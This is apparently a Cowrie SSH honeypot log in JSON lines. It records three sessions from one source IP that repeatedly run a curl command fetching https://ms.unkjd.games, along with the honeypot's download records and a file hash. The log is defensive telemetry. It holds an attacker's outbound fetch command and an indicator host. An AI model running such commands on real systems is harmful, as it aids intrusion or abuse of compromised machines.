{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.532297Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.534808Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.535449Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.537344Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.538024Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.569992Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.571152Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.571772Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.575756Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.577073Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.577885Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.580220Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.580916Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.583908Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.612386Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.613610Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.614170Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.617923Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.618363Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.627166Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.628071Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.630231Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.633537Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.659275Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.660536Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.661416Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.667114Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.669589Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.676360Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.677865Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.678741Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.682645Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.684799Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.685676Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.715019Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.717041Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.719863Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.721011Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.721939Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.726549Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.727477Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.729074Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.729522Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.766416Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.768979Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.770721Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.771166Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.774630Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.777482Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.778153Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.779738Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.780400Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.810051Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.812071Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.813649Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.814363Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.817801Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.818577Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.819707Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.820255Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.823901Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.852602Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.853379Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.856444Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.857176Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.859867Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.860689Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.863584Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.866787Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.894479Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.895525Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.896059Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.900114Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.902058Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.902888Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.905243Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.906159Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.908769Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.914374Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.940058Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
